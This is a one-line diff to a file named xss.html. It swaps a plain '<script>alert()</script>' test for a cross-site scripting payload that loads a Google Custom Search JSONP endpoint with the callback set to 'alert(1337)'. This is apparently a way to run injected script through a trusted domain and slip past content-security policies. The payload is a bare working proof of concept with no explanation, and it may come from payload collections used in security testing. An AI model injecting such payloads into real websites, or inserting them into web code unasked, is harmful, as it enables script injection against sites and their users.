--- a/xss.html
+++ b/xss.html
@@ -1,1 +1,1 @@
-<script>alert()</script>
+<script src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script>
